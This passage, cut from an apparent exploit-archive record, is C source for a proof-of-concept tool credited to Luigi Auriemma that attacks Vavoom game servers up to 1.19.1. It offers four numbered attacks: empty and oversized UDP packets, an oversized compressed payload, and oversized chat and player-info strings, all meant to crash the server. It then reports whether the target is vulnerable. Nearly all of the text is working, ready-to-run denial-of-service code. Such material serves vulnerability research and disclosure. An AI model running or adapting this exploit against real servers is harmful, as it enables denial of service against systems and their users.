protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n #define close closesocket\r\n #define ONESEC 1000\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <sys/param.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 1\r\n#endif\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define PORT 26000\r\n#define BUFFSZ 8192\r\n#define MAXSZ (0x7ff - NET_HEADERSIZE) // this is the max\r\n#define BOFSZ 1040 // less than CBOFSZ and major than MAX_DATAGRAM\r\n#define CBOFSZ 0x7ff // 1200 (or less) is enough\r\n#define FLAGZ(x,y) x | (y & NETFLAG_COMPR_LEN_MASK) | ((len << 16) & NETFLAG_LENGTH_MASK)\r\n#define NICK \"\\\\class\\\\0\" \\\r\n \"\\\\color\\\\0\" \\\r\n \"\\\\name\\\\\"\r\n\r\n#define NET_HEADERSIZE 10\r\n#define MAX_DATAGRAM 1024\r\n#define MAX_INFO_STRING 1024\r\n#define MaxSize 4096\r\n\r\nenum {\r\n clc_bad,\r\n clc_nop,\r\n clc_disconnect,\r\n clc_move,\r\n clc_stringcmd,\r\n clc_player_info,\r\n};\r\n\r\n// NetHeader flags\r\n#define NETFLAG_COMPR_LEN_MASK\t0x000007ff\r\n#define NETFLAG_COMPR_MODE_MASK\t0x0000f800\r\n#define NETFLAG_LENGTH_MASK\t\t0x07ff0000\r\n#define NETFLAG_FLAGS_MASK\t\t0xf8000000\r\n#define NETFLAG_COMPR_NONE\t\t0x00000000\r\n#define NETFLAG_COMPR_ZIP\t\t0x00000800\r\n#define NETFLAG_EOM\t\t\t\t0x08000000\r\n#define NETFLAG_ACK\t\t\t\t0x10000000\r\n#define NETFLAG_DATA\t\t\t0x20000000\r\n#define NETFLAG_UNRELIABLE\t\t0x40000000\r\n#define NETFLAG_CTL\t\t\t\t0x80000000\r\n\r\n// Client request\r\n#define CCREQ_CONNECT\t\t\t1\r\n#define CCREQ_SERVER_INFO\t\t2\r\n\r\n// Server reply\r\n#define CCREP_ACCEPT\t\t\t11\r\n#define CCREP_REJECT\t\t\t12\r\n#define CCREP_SERVER_INFO\t\t13\r\n\r\n\r\n\r\nint info_proto(u_char *data, int len);\r\nu_short vavoom_crc(u_char *data, int len);\r\nint mycpy(u_char *dst, u_char *src);\r\nint send_recv(int sd, u_char *in, int insz, u_char *out, int outsz, int err);\r\nint timeout(int sock, int sec);\r\nu_int resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nstruct sockaddr_in peer;\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n long clen;\r\n u_int seed,\r\n *flags,\r\n *seq,\r\n seqn;\r\n int sd,\r\n i,\r\n len,\r\n ulen,\r\n ver = 1,\r\n attack;\r\n u_short port = PORT,\r\n cport,\r\n *crc;\r\n u_char buff[BUFFSZ],\r\n cbof[MAXSZ],\r\n *p;\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"Vavoom <= 1.19.1 multiple vulnerabilities \" VER \"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: http://aluigi.altervista.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 3) {\r\n printf(\"\\n\"\r\n \"Usage: %s <attack> <host> [port(%hu)]\\n\"\r\n \"\\n\"\r\n \"Attack:\\n\"\r\n \" 1 = socket unreachable through empty or big packet\\n\"\r\n \" 2 = decompression crash (unexploitable buffer-overflow)\\n\"\r\n \" 3 = SV_BroadcastPrintf / Serialize crash (caused by bug 2)\\n\"\r\n \" 4 = SV_SetUserInfo crash / Info_SetValueForKey: oversize infostring\\n\"\r\n \" (caused by bug 2)\\n\"\r\n \"\\n\", argv[0], port);\r\n exit(1);\r\n }\r\n\r\n attack = atoi(argv[1]);\r\n\r\n if(argc > 3) port = atoi(argv[3]);\r\n peer.sin_addr.s_addr = resolv(argv[2]);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\",\r\n inet_ntoa(peer.sin_addr), port);\r\n\r\n flags = (u_int *)buff;\r\n seq = (u_int *)(buff + 4);\r\n crc = (u_short *)(buff + 8);\r\n seed = time(NULL);\r\n\r\n printf(\"- query server:\\n\");\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n\r\n p = buff + 4;\r\n *p++ = CCREQ_SERVER_INFO;\r\n p += mycpy(p, \"VAVOOM\");\r\n *p++ = ver;\r\n len = p - buff;\r\n *flags = htonl(FLAGZ(NETFLAG_CTL, 0));\r\n\r\n len = send_recv(sd, buff, len, buff, sizeof(buff), 1);\r\n close(sd);\r\n ver = info_proto(buff, len);\r\n\r\n if(attack == 1) {\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n\r\n printf(\"- send zero length packet\\n\");\r\n send_recv(sd, buff, 0, buff, sizeof(buff), 0);\r\n\r\n printf(\"- send big packet\\n\");\r\n send_recv(sd, buff, MaxSize + 1, buff, sizeof(buff), 0);\r\n\r\n close(sd);\r\n goto quit;\r\n }\r\n\r\n printf(\"- start connection:\\n\");\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n\r\n printf(\"- send connection request\\n\");\r\n p = buff + 4;\r\n *p++ = CCREQ_CONNECT;\r\n p += mycpy(p, \"VAVOOM\");\r\n *p++ = ver;\r\n len = p - buff;\r\n *flags = htonl(FLAGZ(NETFLAG_CTL, 0));\r\n\r\n len = send_recv(sd, buff, len, buff, sizeof(buff), 1);\r\n\r\n if(buff[4] != CCREP_ACCEPT) {\r\n printf(\"\\nError: your connection has not been accepted\\n\\n\");\r\n exit(1);\r\n }\r\n\r\n cport = *(u_short *)(buff + 5); // I don't know why this is not in network byte order\r\n printf(\"- use server port %hu\\n\", cport);\r\n peer.sin_port = htons(cport);\r\n seqn = 0;\r\n\r\n printf(\"- send ack\\n\"); // useless\r\n p = buff + NET_HEADERSIZE;\r\n len = p - buff;\r\n *flags = htonl(FLAGZ(NETFLAG_ACK, 0));\r\n *seq = seqn++;\r\n *crc = htons(0);\r\n\r\n len = send_recv(sd, buff, len, buff, sizeof(buff), 1);\r\n\r\n if(attack == 2) {\r\n printf(\"- lot of compressed data\\n\");\r\n p = buff + NET_HEADERSIZE;\r\n\r\n ulen = CBOFSZ; // uncompressed size\r\n clen = MAXSZ; // compressed size (not important, just enough big)\r\n memset(cbof, 'A', ulen);\r\n compress(p, &clen, cbof, ulen);\r\n p += clen;\r\n len = p - buff;\r\n\r\n *flags = htonl(FLAGZ(NETFLAG_DATA | NETFLAG_UNRELIABLE | NETFLAG_COMPR_ZIP, ulen));\r\n *seq = seqn++;\r\n *crc = htons(vavoom_crc(buff + NET_HEADERSIZE, len - NET_HEADERSIZE));\r\n\r\n } else if(attack == 3) {\r\n printf(\"- big say string\\n\");\r\n p = buff + NET_HEADERSIZE;\r\n\r\n ulen = BOFSZ;\r\n clen = MAXSZ;\r\n *cbof = clc_stringcmd;\r\n memset(cbof + 1, 'A', ulen);\r\n memcpy(cbof + 1, \"Say \", 4);\r\n cbof[ulen - 1] = 0;\r\n compress(p, &clen, cbof, ulen);\r\n p += clen;\r\n len = p - buff;\r\n\r\n *flags = htonl(FLAGZ(NETFLAG_DATA | NETFLAG_UNRELIABLE | NETFLAG_COMPR_ZIP, ulen));\r\n *seq = seqn++;\r\n *crc = htons(vavoom_crc(buff + NET_HEADERSIZE, len - NET_HEADERSIZE));\r\n\r\n } else if(attack == 4) {\r\n printf(\"- big user info\\n\");\r\n p = buff + NET_HEADERSIZE;\r\n\r\n ulen = BOFSZ;\r\n clen = MAXSZ;\r\n *cbof = clc_player_info;\r\n memset(cbof + 1, 'A', ulen);\r\n memcpy(cbof + 1, NICK, sizeof(NICK) - 1);\r\n cbof[ulen - 1] = 0;\r\n compress(p, &clen, cbof, ulen);\r\n p += clen;\r\n len = p - buff;\r\n\r\n *flags = htonl(FLAGZ(NETFLAG_DATA | NETFLAG_UNRELIABLE | NETFLAG_COMPR_ZIP, ulen));\r\n *seq = seqn++;\r\n *crc = htons(vavoom_crc(buff + NET_HEADERSIZE, len - NET_HEADERSIZE));\r\n\r\n } else {\r\n printf(\"\\nError: wrong attack number (%d)\\n\\n\", attack);\r\n exit(1);\r\n }\r\n\r\n len = send_recv(sd, buff, len, buff, sizeof(buff), 0);\r\n if(len < 0) {\r\n printf(\"- no reply from the server\\n\");\r\n }\r\n\r\n close(sd);\r\n\r\nquit:\r\n printf(\"- wait some seconds\\n\");\r\n for(i = 3; i; i--) {\r\n printf(\"%d\\r\", i);\r\n sleep(ONESEC);\r\n }\r\n\r\n printf(\"- check server:\\n\");\r\n peer.sin_port = htons(port);\r\n\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n\r\n p = buff + 4;\r\n *p++ = CCREQ_SERVER_INFO;\r\n p += mycpy(p, \"VAVOOM\");\r\n *p++ = ver;\r\n len = p - buff;\r\n *flags = htonl(FLAGZ(NETFLAG_CTL, 0));\r\n\r\n if(send_recv(sd, buff, len, buff, sizeof(buff), 0) < 0) {\r\n printf(\"\\n Server IS vulnerable!!!\\n\\n\");\r\n } else {\r\n printf(\"\\n Server does not seem vulnerable\\n\\n\");\r\n }\r\n close(sd);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint info_proto(u_char *data, int len) {\r\n u_int flags;\r\n int ver;\r\n u_char cmd,\r\n *limit;\r\n\r\n limit = data + len;\r\n flags = *(u_int *)data; data += 4;\r\n cmd = *data; data++;\r\n printf(\" Hostname %s\\n\", data); data += strlen(data) + 1;\r\n printf(\" Level %s\\n\", data); data += strlen(data) + 1;\r\n printf(\" Players %hhu/%hhu\\n\", data[0], data[1]); data += 2;\r\n ver = *data; data++;\r\n printf(\" Version %d\\n\", ver);\r\n printf(\" Wads \");\r\n while(data < limit) {\r\n printf(\"%s\", data); data += strlen(data) + 1;\r\n if(!*data) break;\r\n printf(\", \");\r\n }\r\n printf(\"\\n\");\r\n\r\n return(ver);\r\n}\r\n\r\n\r\n\r\nu_short vavoom_crc(u_char *data, int len) {\r\n u_short crc;\r\n const static u_short table[] = {\r\n 0x0000,\t0x1021,\t0x2042,\t0x3063,\t0x4084,\t0x50a5,\t0x60c6,\t0x70e7,\r\n 0x8108,\t0x9129,\t0xa14a,\t0xb16b,\t0xc18c,\t0xd1ad,\t0xe1ce,\t0xf1ef,\r\n 0x1231,\t0x0210,\t0x3273,\t0x2252,\t0x52b5,\t0x4294,\t0x72f7,\t0x62d6,\r\n 0x9339,\t0x8318,\t0xb37b,\t0xa35a,\t0xd3bd,\t0xc39c,\t0xf3ff,\t0xe3de,\r\n 0x2462,\t0x3443,\t0x0420,\t0x1401,\t0x64e6,\t0x74c7,\t0x44a4,\t0x5485,\r\n 0xa56a,\t0xb54b,\t0x8528,\t0x9509,\t0xe5ee,\t0xf5cf,\t0xc5ac,\t0xd58d,\r\n 0x3653,\t0x2672,\t0x1611,\t0x0630,\t0x76d7,\t0x66f6,\t0x5695,\t0x46b4,\r\n 0xb75b,\t0xa77a,\t0x9719,\t0x8738,\t0xf7df,\t0xe7fe,\t0xd79d,\t0xc7bc,\r\n 0x48c4,\t0x58e5,\t0x6886,\t0x78a7,\t0x0840,\t0x1861,\t0x2802,\t0x3823,\r\n 0xc9cc,\t0xd9ed,\t0xe98e,\t0xf9af,\t0x8948,\t0x9969,\t0xa90a,\t0xb92b,\r\n 0x5af5,\t0x4ad4,\t0x7ab7,\t0x6a96,\t0x1a71,\t0x0a50,\t0x3a33,\t0x2a12,\r\n 0xdbfd,\t0xcbdc,\t0xfbbf,\t0xeb9e,\t0x9b79,\t0x8b58,\t0xbb3b,\t0xab1a,\r\n 0x6ca6,\t0x7c87,\t0x4ce4,\t0x5cc5,\t0x2c22,\t0x3c03,\t0x0c60,\t0x1c41,\r\n 0xedae,\t0xfd8f,\t0xcdec,\t0xddcd,\t0xad2a,\t0xbd0b,\t0x8d68,\t0x9d49,\r\n 0x7e97,\t0x6eb6,\t0x5ed5,\t0x4ef4,\t0x3e13,\t0x2e32,\t0x1e51,\t0x0e70,\r\n 0xff9f,\t0xefbe,\t0xdfdd,\t0xcffc,\t0xbf1b,\t0xaf3a,\t0x9f59,\t0x8f78,\r\n 0x9188,\t0x81a9,\t0xb1ca,\t0xa1eb,\t0xd10c,\t0xc12d,\t0xf14e,\t0xe16f,\r\n 0x1080,\t0x00a1,\t0x30c2,\t0x20e3,\t0x5004,\t0x4025,\t0x7046,\t0x6067,\r\n 0x83b9,\t0x9398,\t0xa3fb,\t0xb3da,\t0xc33d,\t0xd31c,\t0xe37f,\t0xf35e,\r\n 0x02b1,\t0x1290,\t0x22f3,\t0x32d2,\t0x4235,\t0x5214,\t0x6277,\t0x7256,\r\n 0xb5ea,\t0xa5cb,\t0x95a8,\t0x8589,\t0xf56e,\t0xe54f,\t0xd52c,\t0xc50d,\r\n 0x34e2,\t0x24c3,\t0x14a0,\t0x0481,\t0x7466,\t0x6447,\t0x5424,\t0x4405,\r\n 0xa7db,\t0xb7fa,\t0x8799,\t0x97b8,\t0xe75f,\t0xf77e,\t0xc71d,\t0xd73c,\r\n 0x26d3,\t0x36f2,\t0x0691,\t0x16b0,\t0x6657,\t0x7676,\t0x4615,\t0x5634,\r\n 0xd94c,\t0xc96d,\t0xf90e,\t0xe92f,\t0x99c8,\t0x89e9,\t0xb98a,\t0xa9ab,\r\n 0x5844,\t0x4865,\t0x7806,\t0x6827,\t0x18c0,\t0x08e1,\t0x3882,\t0x28a3,\r\n 0xcb7d,\t0xdb5c,\t0xeb3f,\t0xfb1e,\t0x8bf9,\t0x9bd8,\t0xabbb,\t0xbb9a,\r\n 0x4a75,\t0x5a54,\t0x6a37,\t0x7a16,\t0x0af1,\t0x1ad0,\t0x2ab3,\t0x3a92,\r\n 0xfd2e,\t0xed0f,\t0xdd6c,\t0xcd4d,\t0xbdaa,\t0xad8b,\t0x9de8,\t0x8dc9,\r\n 0x7c26,\t0x6c07,\t0x5c64,\t0x4c45,\t0x3ca2,\t0x2c83,\t0x1ce0,\t0x0cc1,\r\n 0xef1f,\t0xff3e,\t0xcf5d,\t0xdf7c,\t0xaf9b,\t0xbfba,\t0x8fd9,\t0x9ff8,\r\n 0x6e17,\t0x7e36,\t0x4e55,\t0x5e74,\t0x2e93,\t0x3eb2,\t0x0ed1,\t0x1ef0\r\n };\r\n\r\n crc = 0xffff;\r\n\r\n while(len--) {\r\n crc = (crc << 8) ^ table[(crc >> 8) ^ *data];\r\n data++;\r\n }\r\n\r\n return(crc);\r\n}\r\n\r\n\r\n\r\nint mycpy(u_char *dst, u_char *src) {\r\n u_char *p;\r\n\r\n for(p = dst; *src; src++, p++) {\r\n *p = *src;\r\n }\r\n *p++ = 0;\r\n return(p - dst);\r\n}\r\n\r\n\r\n\r\nint send_recv(int sd, u_char *in, int insz, u_char *out, int outsz, int err) {\r\n int retry,\r\n len;\r\n\r\n if(in) {\r\n for(retry = 3; retry; retry--) {\r\n if(sendto(sd, in, insz, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n if(!timeout(sd, 2)) break;\r\n }\r\n\r\n if(!retry) {\r\n if(!err) return(-1);\r\n fputs(\"\\nError: socket timeout, no reply received\\n\\n\", stdout);\r\n exit(1);\r\n }\r\n } else {\r\n if(timeout(sd, 3) < 0) return(-1);\r\n }\r\n\r\n len = recvfrom(sd, out, outsz, 0, NULL, NULL);\r\n if(len < 0) std_err();\r\n return(len);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock, int sec) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n int err;\r\n\r\n tout.tv_sec = sec;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n err = select(sock + 1, &fd_read, NULL, NULL, &tout);\r\n if(err < 0) std_err();\r\n if(!err) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu_int resolv(char *host) {\r\n struct hostent *hp;\r\n u_int host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u_int *)(hp->h_addr);\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\n# 0day.today [2018-04-07] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/6116"}]}}